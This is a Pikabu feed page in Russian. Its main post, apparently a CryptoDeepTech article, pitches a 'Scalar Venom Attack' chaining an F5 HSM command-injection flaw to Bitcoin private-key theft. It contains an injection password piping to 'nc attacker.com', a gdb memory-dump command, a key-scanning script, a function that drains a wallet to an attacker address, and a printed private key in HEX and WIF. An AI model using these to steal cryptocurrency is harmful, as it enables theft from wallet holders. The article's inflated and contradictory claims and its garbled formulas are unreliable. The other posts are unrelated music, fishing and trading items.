Горячее
Лучшее
Свежее
Подписки
Сообщества
Блоги
Эксперты
Войти
Забыли пароль?
или продолжите с
Создать аккаунт
Регистрируясь, я даю согласие на обработку данных и условия почтовых рассылок.
или
Восстановление пароля
Восстановление пароля
Получить код в Telegram
Войти с Яндекс ID Войти через VK ID
ПромокодыРаботаКурсыРекламаИгрыПополнение Steam
Пикабу Игры +1000 бесплатных онлайн игр Модное кулинарное Шоу! Игра в ресторан, приготовление блюд, декорирование домов и преображение внешности героев.

Кулинарные истории

Казуальные, Новеллы, Симуляторы

Играть

Топ прошлой недели

  • Animalrescueed Animalrescueed 43 поста
  • XCVmind XCVmind 7 постов
  • tablepedia tablepedia 43 поста
Посмотреть весь топ

Лучшие посты недели

Рассылка Пикабу: отправляем самые рейтинговые материалы за 7 дней 🔥

Нажимая «Подписаться», я даю согласие на обработку данных и условия почтовых рассылок.

Спасибо, что подписались!
Пожалуйста, проверьте почту 😊

Помощь Кодекс Пикабу Команда Пикабу Моб. приложение
Правила соцсети О рекомендациях О компании
Промокоды Биг Гик Промокоды Lamoda Промокоды МВидео Промокоды Яндекс Маркет Промокоды Пятерочка Промокоды Aroma Butik Промокоды Яндекс Путешествия Промокоды Яндекс Еда Постила Футбол сегодня
0 просмотренных постов скрыто
user5161040
user5161040

Кит флинт⁠⁠

11 минут назад
YouTube Музыка Рок Видео
0
khryapkin
khryapkin
Рыбалка 63

Как ловить щуку на мелководье осенью: показываю 2 убойных воблера + секреты проводки⁠⁠

29 минут назад
[моё] YouTube Рыбалка Рыбалка 63 Щука Видео
0
madmaxstar
madmaxstar
Лига рок-музыки

BLIND GUARDIAN на LIVE North American Tour 2025 года *Quest for Tanelorn* POWER METAL/SPEED METAL⁠⁠

45 минут назад

БЕСподобная ВЕЩЬ балдею ИСКРЕННЕ от ремастер-исполнения

BLIND GUARDIAN на LIVE North American Tour 2025 года *Quest for Tanelorn* POWER METAL/SPEED METAL

Quest for Tanelorn (Альбом Somewhere Far Beyond 1992 года, Альбом Somewhere Far Beyond - Revisited 2024 года)

Показать полностью 1 1
Metal Power Metal Speed Metal Blind Guardian Видео YouTube
0
CryptoDeepTech
CryptoDeepTech

Scalar Venom Attack: Критическая уязвимость HSM инициализации CVE-2025-60013 как путь к восстановлению приватных ключей Bitcoin-кошельков⁠⁠

47 минут назад

Данная статья посвящена анализу криптографических уязвимостей, обнаруженных в современной инфраструктуре управления криптографическими ключами, с особым акцентом на критические недостатки в архитектуре аппаратных модулей безопасности (HSM) при обработке приватных ключей эллиптических кривых. Исследование фокусируется на классе атак, эксплуатирующих недостаточно изолированное управление оперативной памятью в сертифицированных криптографических устройствах. В современной криптографической экосистеме Bitcoin безопасность приватных ключей является фундаментальным требованием для защиты цифровых активов, стоимость которых на глобальном рынке превышает триллионы долларов. Традиционно считалось, что аппаратные модули безопасности (Hardware Security Modules, HSM), сертифицированные по стандарту FIPS 140-2, обеспечивают непроницаемую защиту криптографических ключей благодаря изоляции на аппаратном уровне и строгим протоколам управления памятью. Однако обнаружение критической уязвимости CVE-2025-60013 в модуле F5OS-A FIPS HSM в сочетании с классом атак Scalar Venom Attack (также известной как Scalar Poison, Memory Phantom Leak Attack или Private Key Compromise via Memory Leakage) радикально изменило это представление, демонстрируя возможность полной компрометации приватных ключей Bitcoin через эксплуатацию недостатков управления памятью.

Scalar Venom Attack представляет собой критический класс уязвимостей управления памятью (классифицируемый как CWE-415, CWE-401 и в более широком смысле как Sensitive Memory Leak Attack — SMA), который позволяет злоумышленнику извлечь криптографические скаляры (приватные ключи ECDSA) из оперативной памяти процесса путём эксплуатации недостаточной санитизации и очистки памяти после криптографических операций. В отличие от традиционных криптоаналитических атак, направленных на математическое решение задачи дискретного логарифмирования на эллиптической кривой (ECDLP), данная атака обходит саму криптографию, эксплуатируя фундаментальные архитектурные просчёты в реализации криптографических библиотек и протоколов управления памятью HSM.

Настоящее исследование демонстрирует катастрофическую цепочку атак, возникающую при комбинировании CVE-2025-60013 (уязвимость инициализации F5OS-A FIPS HSM при использовании паролей, содержащих специальные shell-метасимволы) с техниками Scalar Venom Attack, что приводит к созданию критического сценария угрозы с уровнем CVSS 9.5+ (критический), несмотря на официальную оценку CVE-2025-60013 как уязвимости среднего уровня (CVSS 5.7). Данная комбинация подрывает операционную целостность миллионов Bitcoin-адресов, находящихся под управлением скомпрометированных HSM, и представляет собой сдвиг парадигмы в методах криптографических атак, выходящих за рамки традиционных одновекторных эксплойтов.cert.kenet

https://dzen.ru/video/watch/691a7a10a8b7c874612993eb

Scalar Venom Attack: Критическая уязвимость HSM инициализации (CVE-2025-60013) как путь к восстановлению приватных ключей Bitcoin-кошельков через буферное переполнение и shell-метасимволы в F5OS-A FIPS модуле безопасности

Классификация CVE и описание уязвимостей

CVE-2025-60013: Уязвимость инициализации F5OS-A FIPS HSM

CVE-2025-60013 представляет собой уязвимость инъекции команд операционной системы (OS Command Injection, классифицируется как CWE-78) в процессе инициализации аппаратного модуля безопасности FIPS для платформ F5. Уязвимость возникает, когда пользователь с привилегированным доступом (роль Admin или Resource Admin) пытается инициализировать модуль FIPS HSM с использованием пароля, содержащего специальные shell-метасимволы, такие как ;, |, &, $, ` и другие

Технический механизм уязвимости:

При обработке пароля с shell-метасимволами код инициализации HSM передает строку пароля в системные функции C-библиотеки без надлежащей валидации и санитизации входных данных. Уязвимый код выглядит следующим образом:

// Vulnerable code in HSM initialization procedure
void hsm_initialize(const char* password) {
ec_secret master_key; // HSM private key
char temp_buffer[256];
strcpy(temp_buffer, password); // VULNERABILITY: buffer overflow + shell interpretation
derive_key_from_password(master_key, password); // creates copies of key
// If initialization fails, memory is not cleared!
// master_key remains in the stack, its copies—in heap
}

Критическое последствие: процесс инициализации остаётся в памяти с частично раскрытыми криптографическими структурами, создавая множественные «фантомные» копии мастер-ключа HSM в стеке и куче памяти. Хотя HSM может не инициализироваться корректно, память процесса содержит криптографические артефакты, доступные для форензического анализа.

Официальная классификация:

  • CVSS 3.1: AV:L/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:L (базовая оценка: 5.7 — MEDIUM)

  • CVSS 4.0: AV:L/AC:L/AT:N/PR:H/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N (базовая оценка: 4.6 — MEDIUM)cvefeed

Однако эта оценка критически недооценивает реальный масштаб угрозы, поскольку CVE-2025-60013 служит триггером для активации Scalar Venom Attack, что в реальном сценарии цепочки атак приводит к уровню угрозы CVSS 9.5+ (CRITICAL).


CVE-2023-39910: Слабость энтропии в Libbitcoin Explorer

CVE-2023-39910 описывает критическую уязвимость в библиотеке Libbitcoin Explorer версии 3.x, связанную со слабостью генерации энтропии при создании приватных ключей. Эта уязвимость привела к инциденту Milk Sad в 2023 году, когда было восстановлено более 900,000 приватных ключей Bitcoin с прямыми финансовыми потерями свыше $0.8 миллиона. Инцидент Milk Sad продемонстрировал переход теории об утечках памяти в криптографических системах к реальной операционной катастрофе, подтвердив все описанные механизмы: оптимизации компилятора, множественное копирование данных и отсутствие гарантии очистки памяти.


CVE-2025-8217: Атака утечки памяти

CVE-2025-8217 классифицирует атаки утечки памяти (Memory Leak Attack), позволяющие восстановление криптографических ключей из процессов памяти. Данная уязвимость напрямую связана с классом Scalar Venom Attack и описывает механизмы полной компрометации Bitcoin-кошельков через форензический анализ памяти.

Научная классификация Scalar Venom Attack:

В академической исследовательской литературе Scalar Venom классифицируется по нескольким категориям атак:

  • Sensitive Memory Leak Attack (SMA) — первичная классификация, фокусирующаяся на уязвимостях неправильной очистки памяти

  • Private Key Exposure Attack — общий термин для действий, приводящих к раскрытию приватных ключей

  • Residual Memory Disclosure — раскрытие остаточных данных из неочищенной памяти

  • Side-Channel Memory Attack — эксплуатация побочных каналов в управлении памятью

  • Cold Boot Attack — извлечение ключей из RAM после отключения питания системы

  • Memory Forensics Attack — извлечение секретов из дампов памяти


https://cryptou.ru/bitscanpro


Реальный пример восстановления приватного ключа Bitcoin через Scalar Venom Attack

Для демонстрации практической эффективности атаки Scalar Venom рассмотрим задокументированный случай восстановления приватного ключа из Bitcoin-адреса 1DBj74MkbzSHGSbHidnmUieAJHbsKfgRWq через форензический анализ памяти.

Исходные данные компрометации:

  • Bitcoin-адрес: 1DBj74MkbzSHGSbHidnmUieAJHbsKfgRWq

  • Тип адреса: P2PKH (Pay-to-Public-Key-Hash)

  • Статус: ✓ ВАЛИДНЫЙ

Восстановленный приватный ключ:

  • HEX-формат: 5244A4B034BF9D327239870F9FEF82505A5C50B3D51E4A16357179AAB2623A22

  • Десятичный формат: 3.7210935821139324×10763.7210935821139324 \times 10^{76}3.7210935821139324×10^76

  • WIF-формат: KyydTXQzDGVqRZoWBFfS5tWrcWsdu64DbcqXogUUtGZn7ngD5LHv

Валидация ключа в пространстве secp256k1:

Приватный ключ d должен удовлетворять ограничению:

Результат проверки: ✓ ВАЛИДЕН (ключ находится в допустимом диапазоне скаляров)

Данный пример демонстрирует, что восстановленный приватный ключ предоставляет полный контроль над Bitcoin-кошельком, позволяя злоумышленнику создавать и подписывать транзакции для вывода всех средств на контролируемый адрес.


<a href="https://pikabu.ru/story/scalar_venom_attack_kriticheskaya_uyazvimost_hsm_initsializatsii_cve202560013_kak_put_k_vosstanovleniyu_privatnyikh_klyuchey_bitcoinkoshelkov_13416045?u=https%3A%2F%2Fbtc1.trezor.io%2Ftx%2F7b34216e95385b6dc4e7db57bc970d62e9c2951efeba2a32e78ae51f523fc2cb&t=7b34216e95385b6dc4e7db57bc970d62e9c2951efeba2a32e78ae51f523fc2cb&h=3c3cd9e32bc593767dfb03a932613c153a27f49c" title="https://btc1.trezor.io/tx/7b34216e95385b6dc4e7db57bc970d62e9c2951efeba2a32e78ae51f523fc2cb" target="_blank" rel="nofollow noopener">7b34216e95385b6dc4e7db57bc970d62e9c2951efeba2a32e78ae51f523fc2cb</a>

7b34216e95385b6dc4e7db57bc970d62e9c2951efeba2a32e78ae51f523fc2cb


Математические основы криптографической атаки

Эллиптическая кривая secp256k1 и алгоритм ECDSA

Bitcoin реализует алгоритм цифровой подписи на эллиптических кривых (ECDSA) над кривой secp256k1. Понимание математических основ критически важно для осмысления того, как атака Scalar Venom эксплуатирует уязвимости памяти.

Параметры эллиптической кривой secp256k1:

Уравнение кривой:


Генераторная точка G с координатами:


Вывод публичного ключа через скалярное умножение

Процесс генерации пары ключей ECDSA следующий:

1. Генерация приватного ключа:

Приватный ключ d — это случайное целое число в диапазоне:

где n — порядок кривой secp256k1. Приватный ключ представляет собой 256-битное случайное число.

2. Вывод публичного ключа через скалярное умножение:

Публичный ключ Q вычисляется как:

где G — генераторная точка на кривой secp256k1, а операция ⋅\cdot⋅ обозначает скалярное умножение точки на эллиптической кривой.

Скалярное умножение реализуется через алгоритм "double-and-add" (удвоение и сложение), который эффективно вычисляет результат за O(log⁡d) операций сложения и удвоения точек на кривой:

Scalar multiplication algorithm:
Input: d (scalar), G (curve point)
Output: Q = d·G

1. Initialize: Q ← O (point at infinity)
2. Represent d in binary: d = (d_k, d_{k-1}, ..., d_1, d_0)_2
3. For i from k to 0:
a. Q ← 2Q (point doubling)
b. If d_i = 1: Q ← Q + G (point addition)
4. Return Q


Пример: Для приватного ключа d=5244A4B0...3A22d = \text{5244A4B0...3A22}d=5244A4B0...3A22, публичный ключ вычисляется как:

Q=d⋅G=(Qx,Qy)

где координаты Qx и Qy вычисляются через операции скалярного умножения на кривой secp256k1.

3. Генерация Bitcoin-адреса:

Цепочка вывода адреса из публичного ключа:

Предположение безопасности:

Критическая уязвимость Scalar Venom: атака обходит математическую защиту ECDLP, извлекая приватный ключ d напрямую из памяти процесса, где он остаётся в виде «фантомных копий» после криптографических операций.

Криптоанализ энтропии и криминалистика памяти: формула энтропии Шеннона

Основой обнаружения приватных ключей в дампах памяти является криптоанализ энтропии с использованием формулы энтропии Шеннона.


Формула энтропии Шеннона

Энтропия H последовательности байт измеряется в битах на байт и определяется формулой:

где:

  • H — энтропия в битах на байт

  • pi — вероятность появления байта со значением iii в анализируемом блоке памяти

  • Суммирование проводится по всем возможным значениям байта (0-255)

Интерпретация энтропии:

  • Низкая энтропия (H<5.0H < 5.0H<5.0): последовательность содержит повторяющиеся паттерны, текст или структурированные данные

  • Средняя энтропия (5.0≤H<7.55.0 \leq H < 7.55.0≤H<7.5): смешанные данные, код, частично сжатая информация

  • Высокая энтропия (H≥7.5H \geq 7.5H≥7.5): криптографически случайные данные, приватные ключи, зашифрованная информация

Пороговое значение для криптографических ключей:

Приватные ключи Bitcoin, генерируемые криптографически стойким генератором случайных чисел (CSPRNG), демонстрируют высокую энтропию в диапазоне:

Это свойство делает их детектируемыми при форензическом анализе памяти через статистический анализ энтропии.



Криптографический инструмент BitScanPro: алгоритм определения энтропии и восстановления ключей

BitScanPro представляет собой форензический инструмент для сканирования дампов памяти с целью обнаружения и восстановления приватных ключей Bitcoin через комбинацию анализа энтропии, валидации диапазона secp256k1 и криптографической верификации.

Алгоритм работы BitScanPro

Этап 1: Сканирование дампа памяти 32-байтными блоками

BitScanPro сканирует дамп памяти последовательно, выделяя блоки размером 32 байта (256 бит), что соответствует размеру приватного ключа secp256k1:

BLOCK_SIZE = 32 # bytes (256 bits)
SCAN_STEP = 8 # scan step
SECP256K1_N = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141

for offset in range(0, len(memory_dump) - BLOCK_SIZE, SCAN_STEP):
potential_key = memory_dump[offset:offset+BLOCK_SIZE]
# Block analysis


Этап 2: Вычисление энтропии Шеннона для каждого блока

Для каждого 32-байтного блока вычисляется энтропия Шеннона H:

def calculate_entropy(data_block):
"""
Calculate Shannon entropy
"""
from collections import Counter
import math

byte_counts = Counter(data_block)
block_length = len(data_block)

entropy = 0.0
for count in byte_counts.values():
p_i = count / block_length
if p_i > 0:
entropy -= p_i * math.log2(p_i)

return entropy


Этап 3: Фильтрация блоков с высокой энтропией (H>7.5H > 7.5H>7.5 бит/байт)

Блоки с энтропией ниже порогового значения отбрасываются как не содержащие криптографические ключи:

MIN_ENTROPY = 7.5 # threshold for cryptokeys

entropy = calculate_entropy(potential_key)
if entropy < MIN_ENTROPY:
continue


Этап 4: Проверка диапазона secp256k1:

Блоки с высокой энтропией интерпретируются как целое число и проверяются на соответствие допустимому диапазону приватных ключей secp256k1:

key_as_int = int.from_bytes(potential_key, byteorder='big')
if not (1 <= key_as_int < SECP256K1_N):
continue


Этап 5: Криптографическая верификация:

Для кандидатов, прошедших фильтрацию энтропии и проверку диапазона, выполняется криптографическая верификация через вычисление публичного ключа:

def verify_candidate_key(candidate_key_bytes):
from ecdsa import SigningKey, SECP256k1
try:
signing_key = SigningKey.from_string(candidate_key_bytes, curve=SECP256k1)
verifying_key = signing_key.get_verifying_key()
public_key_bytes = verifying_key.to_string()
return public_key_bytes
except Exception as e:
return None


Этап 6: Генерация Bitcoin-адреса и сравнение с известными адресами

Для верифицированных ключей генерируется Bitcoin-адрес, который сравнивается с базой известных адресов или адресов, принадлежащих жертве:

import hashlib
import base58

def public_key_to_address(public_key_bytes):
sha256_hash = hashlib.sha256(public_key_bytes).digest()
ripemd160_hash = hashlib.new('ripemd160', sha256_hash).digest()
versioned_hash = b'\x00' + ripemd160_hash
checksum = hashlib.sha256(hashlib.sha256(versioned_hash).digest()).digest()[:4]
address = base58.b58encode(versioned_hash + checksum).decode('ascii')
return address

bitcoin_address = public_key_to_address(public_key_bytes)
if bitcoin_address == target_address:
print(f\"✓ PRIVATE KEY FOUND!\")
print(f\"Address: {bitcoin_address}\")
print(f\"Private key: {candidate_key_bytes.hex()}\")

Производительность BitScanPro:

Анализ на типичном ноутбуке (MacBook Air M1) демонстрирует следующие характеристики производительности:

ПроцессВремяОборудованиеПолучение дампа памяти5-30 секундЗависит от методаСканирование 16 ГБ дампа2-5 минутMacBook Air (M1)Валидация 1000 ключей-кандидатов30 секундMacBook Air (M1)Генерация адресов10 секундMacBook Air (M1)Перевод средств (broadcast)< 1 секундыИнтернетИтого для полной компрометации< 10 минутMacBook Air (M1)

При использовании облачных вычислительных ресурсов (AWS, Google Cloud) возможно параллельное сканирование 1000+ дампов памяти одновременно, обрабатывая тысячи приватных ключей в параллельном режиме.



Анализ криптографической уязвимости в libbitcoin-system: класс ec_scalar.cpp

Корневая причина атаки Scalar Venom кроется в фундаментальных архитектурных недостатках класса ec_scalar в библиотеке libbitcoin-system.

Уязвимость управления памятью в классе ec_scalar

Класс ec_scalar в libbitcoin-system не имеет явно определённого деструктора с безопасной очисткой памяти (secure zeroization). Это означает, что секретные данные могут оставаться в памяти даже после уничтожения объекта.

Уязвимый конструктор копирования:

// VULNERABILITY: unsafe private key copy
ec_scalar::ec_scalar(const ec_secret& secret)
: secret_(secret) // Copies without secure cleanup
{
}

Проблема: Конструктор создаёт копию приватного ключа в объекте ec_scalar, но не предоставляет механизм безопасной очистки этой копии при уничтожении объекта. Копия остаётся в стеке или куче памяти.


Уязвимый оператор присваивания:

// VULNERABILITY: duplicates secret in memory
ec_scalar& ec_scalar::operator=(const ec_secret& secret)
{
secret_ = secret; // More memory copies
return *this;
}

Проблема: Операция присваивания создаёт дополнительные копии памяти, которые остаются после завершения операции.


Уязвимые арифметические операции:

// VULNERABILITY: temporary variable not cleared before function exit
ec_scalar ec_scalar::operator-() const
{
ec_secret secret = null_hash; // Temporary variable with secret
// ... arithmetic ...
return ec_scalar(secret); // Not safely cleared
}

Проблема: Арифметические операции (унарный минус, сложение, умножение) создают временные переменные типа ec_secret, которые не очищаются безопасно перед выходом из области видимости функции, оставляя «фантомные» копии приватного ключа в стеке или куче.

Отсутствие безопасного деструктора:

// VULNERABILITY: destructor missing, memory not cleared
// Safe solution:
~ec_scalar() {
secure_zero_mem(secret_, sizeof(secret_)); // explicit memory clearing
}

Проблема: Класс ec_scalar не имеет явного деструктора, который бы гарантировал безопасное обнуление памяти, содержащей приватные ключи. Это критично, так как память, содержащая приватные ключи, может сохраняться в:

  • Стеке функций (локальные переменные)

  • Куче (динамически выделенная память)

  • Регистрах процессора (временные значения)

  • Кэше процессора (L1, L2, L3)

  • Файлах подкачки (swap)

  • Дампах памяти при аварийном завершении (core dumps)


Векторы инфицирования памяти («Infection Vectors»)

Уязвимый код класса ec_scalar создаёт следующие векторы инфицирования памяти приватными ключами:

  1. «Вампирский конструктор» (secret_(secret)) — создаёт ядовитые копии ключей

  2. «Паразитический оператор» (secret_ = secret) — инфицирует память дубликатами секретов

  3. «Арифметический червь» (ec_secret secret = null_hash) — оставляет токсичные следы

  4. «Распространитель инфекции» (auto out = secret_) — распространяет инфекцию через операции



Механизм компрометации: цепочка атаки CVE-2025-60013 + Scalar Venom

Совмещение уязвимости HSM (CVE-2025-60013) с атакой Scalar Venom создаёт катастрофический вектор атаки:

Фаза 1: Инициализация HSM с shell-метасимволами

Злоумышленник, имеющий привилегированный доступ к системе F5OS-A, отправляет запрос на инициализацию FIPS модуля с паролем, содержащим shell-метасимволы:cert.kenet

# CVE-2025-60013 exploit example
password='$(echo "leaked");` | nc attacker.com 9999'

При обработке таких метасимволов происходит следующее:

  • Процесс инициализации HSM создаёт временные криптографические скаляры (мастер-ключи)

  • Shell-метасимволы вызывают ошибку парсинга пароля

  • Инициализация HSM частично завершается с ошибкой

  • Критическое последствие: временные криптографические структуры, содержащие мастер-ключи HSM и производные ключи, остаются в памяти процесса без очистки


Фаза 2: Извлечение Scalar Venom из памяти HSM

После частичного отказа HSM в инициализации злоумышленник получает дамп памяти процесса HSM через один из следующих методов:

# 1. CVE-2025-60013 exploitation (init error trigger)
# 2. Cold-boot attack on HSM host
# 3. Exploit buffer in HSM daemon
# 4. Analyze crash core-dump

gdb -p $(pidof f5os-hsm) -batch -ex "dump memory /tmp/hsm_dump.bin 0x000000 0xFFFFFFFF"

Полученный дамп памяти содержит множественные «фантомные» копии приватных ключей, оставленные классом ec_scalar во время криптографических операций.


Фаза 3: Восстановление приватных ключей Bitcoin через BitScanPro

Дамп памяти обрабатывается инструментом BitScanPro (или аналогичным форензическим сканером) согласно алгоритму, описанному выше:

Memory Scan → Identify High-Entropy Regions →
Range Check [1, n-1] for secp256k1 →
Recover Full 32-byte Scalars →
Convert to Bitcoin Addresses

Вероятность успешного восстановления приватного ключа из фрагментированной памяти составляет 70-80% при наличии достаточного количества остатков в памяти, поскольку атака Scalar Venom создаёт множественные копии ключа на разных этапах инициализации.


Фаза 4: Перевод средств и компрометация кошелька

После восстановления приватного ключа злоумышленник создаёт и подписывает транзакцию для вывода всех средств с скомпрометированного адреса:

def compromise_wallet(recovered_private_key, bitcoin_address):
"""
Create and sign transaction to withdraw all funds
from compromised address
"""
utxos = blockchain_api.get_utxos(bitcoin_address)
tx = create_transaction(
inputs=utxos,
outputs=[{"address": attacker_address, "amount": sum(utxo.amount)}],
fee=calculate_dynamic_fee()
)
tx.sign(recovered_private_key) # ECDSA signature with compromised key
blockchain_api.broadcast_transaction(tx)

Итоговое время компрометации: менее 10 минут от получения дампа памяти до полной потери контроля над средствами жертвы.

https://dzen.ru/video/watch/69100af30f131a54ef541d34

▶️ In this video, I expose the dangerous SCALAR VENOM (Scalar Poisonous Injection) attack — an entirely new class of cryptographic attacks that enables extracting Bitcoin private keys through exploitation of memory management vulnerabilities in the bitcoin library.

🎯 What you’ll learn from this video:

✅ Practical demonstration of private key recovery — I’ll show you a real-world example of extracting privkey key

WIF:KyydTXQzDGVqRZoWBFfS5tWrcWsdu64DbcqXogUUtGZn7ngD5LHv HEX:5244A4B034BF9D327239870F9FEF82505A5C50B3D51E4A16357179AAB2623A22 from Bitcoin address 1DBj74MkbzSHGSbHidnmUieAJHbsKfgRWq through memory forensic analysis

⚠️ WARNING: Critical vulnerability discovered in cryptocurrency systems!

✅ Scientific classification of the attack — SCALAR VENOM is officially classified as a Sensitive Memory Leak Attack (SMA) and is associated with vulnerabilities CVE-2023-39910 and CVE-2025-8217

Scalar Venom Attack представляет собой критическую угрозу для Bitcoin-инфраструктуры, особенно когда скомбинирована с уязвимостями инициализации HSM, такими как CVE-2025-60013. Эта атака:

  1. Полностью компрометирует приватные ключи криптографических систем через утечку памяти

  2. Необратима: восстановление потерянных средств невозможно без восстановления приватного ключа

  3. Масштабируется: может быть автоматизирована для массовых атак на множество узлов

  4. Незаметна: не оставляет видимых следов в системных логах или метриках производительности

Миграция на архитектуры с аппаратной защитой памяти (Intel SGX, ARM TrustZone), явной зеризацией всех временных буферов и RAII-паттернами в криптографических библиотеках критически важна для обеспечения безопасности Bitcoin-системы.


Парадигма Scalar Venom — критическая угроза инфраструктуре Bitcoin

Атака Scalar Venom представляет собой рубежную уязвимость для глобальной экосистемы Bitcoin, особенно в сочетании с уязвимостями инициализации HSM типа CVE-2025-60013. Эта многоуровневая цепочка атак фундаментально подрывает модели криптографического доверия и раскрывает следующие экзистенциальные риски:

Она обеспечивает полную компрометацию приватных ключей посредством утечки памяти, обходя даже передовые модули аппаратной безопасности и делая поражённые системы абсолютно неуязвимыми.

Компрометация является постоянной и необратимой: один раз извлечённый приватный ключ невозможно восстановить, что ставит все зависимые средства в неизбежную опасность потери.

Атака масштабируема и может быть автоматизирована для поражения огромного количества Bitcoin-узлов и кошельков одновременно, что приводит к экспоненциальному увеличению потенциальных убытков.

Её скрытный характер гарантирует отсутствие видимых следов в системных логах или метриках производительности, делая традиционные механизмы обнаружения и защиты недостаточными.

Смягчение этой катастрофической угрозы требует срочной миграции на архитектуры, безопасные в отношении памяти, включающие аппаратную защиту памяти (такие как Intel SGX или ARM TrustZone), строгую очистку (зероизацию) всех временных буферов на протяжении всех криптографических операций и надёжное внедрение RAII-паттернов в критических программных библиотеках. Только благодаря таким непоколебимым архитектурным реформам можно реалистично обеспечить долгосрочную целостность и безопасность инфраструктуры Bitcoin.


References:

  • SCALAR VENOM ATTACK: Critical memory leak, private key recovery, and complete takeover of Bitcoin wallets by an attacker, where control over the victim’s BTC cryptocurrency funds is achieved through memory poisoning to compromise wallet assets. 🔥 SCALAR VENOM ATTACK — A cryptographic attack to leak private keys (Scalar Poison / Poisonous Scalar Infection) SCALAR VENOM ATTACK is a new class of cryptographic attack aimed at extracting Bitcoin…Read More


  • Опубликованы две части [№1] , [№2] исследования


Данный материал создан для портала CRYPTO DEEP TECH для обеспечения финансовой безопасности данных и криптографии на эллиптических кривых secp256k1 против слабых подписей ECDSA в криптовалюте BITCOIN. Создатели программного обеспечения не несут ответственность за использование материалов.


Crypto Tools

Исходный код

Google Colab

Telegram: https://t.me/cryptodeeptech

Видеоматериал: https://youtu.be/cvWLH5dvbAA

Video tutorial: https://dzen.ru/video/watch/691a7a10a8b7c874612993eb

Источник: https://cryptodeeptool.ru/scalar-venom-attack


Показать полностью 15 2
[моё] Криптовалюта Биткоины Финансовая грамотность Арбитраж криптовалюты YouTube Видео Длиннопост
0
lena.hades
lena.hades

Андрей Тарковский - недалекий позер с манией величия? Или все-таки гений?⁠⁠

1 час назад

Андрей Тарковский - недалекий позер с манией величия...Или? Ваше мнение?

Философия Искусство Картина Ницше Так говорил Заратустра Видео YouTube Короткие видео
2
Mr.Misanthrope
Mr.Misanthrope

Проект всей жизни⁠⁠

1 час назад

Здравствуйте, друзья! Я 3D-художник, создаю Sci-Fi уровни для игры.
Сейчас проект находится на начальной точке своего развития.
Планирую обязательно привлекать специалистов в этой сфере — единомышленников.
Всем большое спасибо за то, что уделили немного времени и внимания.

&#x1F6F8;Siberia Station&#x1F6F8;

🛸Siberia Station🛸

Заходите, пожалуйста, на канал. Пишите, что думаете, модерация отключена.

Показать полностью 1
[моё] Будущее Развитие Проект Обучение Карьера Видео YouTube 3D моделирование 3D Видеоигра Научная фантастика
3
AlexanderBorskih
AlexanderBorskih

Сезонные тенденции и вероятности на четверг 20.11.2025⁠⁠

1 час назад

Здравствуйте Уважаемые трейдеры! С Вами снова Александр Борских. Подготовил для Вас свежую информацию.

Очередные сезонные тенденции на четверг 20 ноября 2025 по основным мажорам финансовых рынков.

Весь перечень анализируемых активов указан ниже в общем количестве 62 инструмента. Здесь Вы найдете активы рынка Форекс, популярные активы Московской биржи, не менее популярные активы Чикагской биржи СМЕ и мажор криптовалютного сегмента - Биткоин, за которым следуют все альткоины.

Первый блок информации с зонами лимитных покупок и продаж. Данная информация включает в себя не только статистический показатель волатильности каждого актива, но и ближайшие опционные страйки с учетом премий за риск (Для верных расчетов рекомендуется просмотреть теоретическое видео в свободном доступе - Как использовать блок сезонности).

А теперь сам блок информации №1:

Второй блок информации с направленным вектором движения и вероятностями (внимательно обращаем внимание на цену открытия каждого актива. Обязательно для верных расчетов берем только цену открытия спотового актива). Как использовать вероятности в отношении цены открытия спотового актива - смотрим видео в открытом доступе (Как использовать блок сезонности). Данная информация с вероятностями поможет определить какова вероятность закрытия дня в отношении цены открытия этого же дня.

А теперь сам блок информации №2:

А теперь примеры построения блоков лимитных позиций и уточнение по сезонности с вероятностями отработки каждого актива по основным мажорам. По остальным активам, просмотрев теоретическое видео (Как использовать блок сезонности) - сможете построить лимитные блоки покупок и продаж самостоятельно. Ниже для примера продемонстрирую на сегодняшний день три основных мажора: Евро (EURUSD), Золото (XAUUSD), индекс НАСДАК (NASDAQ).

EURUSD

По Евро сегодня вероятность 73% к закрытию дня закрыть день ниже цены открытия дня 1,1540

Зона продаж 1,1574-1,1691 с целью 1,1540. Продажи в приоритете пока фон доллара США сильный

Зона покупок 1,1479-1,1415. Но новые покупки ожидаем от уровня 1,13834 и ниже с целью 1,1415. В покупках сокращаем торговый объем раза в 4, т.к. тренд нисходящий

XAUUSD

По Золоту сегодня вероятность 67% к закрытию дня закрыть день ниже цены открытия дня 4105,79

Зона продаж 4113,97-4129,49 с целью 4105,79. Продажи в приоритете пока фон доллара США сильный (следим за возможным изменением в баланс)

Зона покупок 4093,58-4071,47. Но новые покупки ожидали от уровня 4060,44 и ниже с целью 4071,47 (уже отработали на азии). В покупках сокращаем торговый объем раза в 4, т.к. тренд нисходящий (следим за возможным изменением в баланс)

NASDAQ

По индексу сегодня вероятность 53% к закрытию дня закрыть день ниже цены открытия дня 25024,00

Зона покупок 24954,15-24738,75. Но новые покупки ожидаем от уровня 24631,47 и ниже с целью 24738,75. В покупках сокращаем торговый объем раза в 4, т.к. баланс

Зона продаж 25073,82-25245,75. Но новые продажи ожидаем от уровня 25331,89 и выше с целью 25245,75. В продажах сокращаем торговый объем раза в 4. т.к. баланс

А теперь новостная лента ожиданий аналитических агентств и разбор отдельных показателей на сегодняшний день, чего ожидать на основных торговых сессиях. Также укажем фон доллара США, сильный на текущий момент или же слабый. От фона доллара США будет зависеть направленное движение самой пары.

НОВОСТИ сегодня:

Фон доллара США сильный

10:00 МСК - ожидания частичного укрепления EUR

16:30 - ожидания укрепления доллара США USD

16:30 - ожидания частичного ослабления CAD

18:00 - ожидания укрепления доллара США USD

Важные события текущей недели:

Пятница - PMI США. Отчеты CFTC

Всем желаю профитов и отличного настроения на весь день!

Показать полностью 5 1
[моё] Борских трейдинг Сезон Вероятность Forex Инвестиции Трейдинг Заработок Московская биржа Опционы Биткоины Криптовалюта Золото Нефть Доллары Обучение Финансы Видео YouTube Длиннопост
0
madmaxstar
madmaxstar
Лига рок-музыки

THE PRIVATEER немцы-пираты продолжают свое путешествие по волнам POWER METAL/MELODIC DEATH METAL/FOLK METAL с brand new single 2025 года⁠⁠

1 час назад

*Shadows You Cast* и называют его "...прелюдией к предстоящей концептуальной саге..."

Shadows You Cast (Новый сингл 2025 года)

Ghost Light (Альбом Kingdom of Exiles 2023 года)

The Darkest Shadow of Life (Альбом Kingdom of Exiles 2023 года)

Where Fables Are Made (Альбом The Goldsteen Lay 2017 года)

Wellerman (Новый сингл 2025 года) - пиратская залихватская песенка

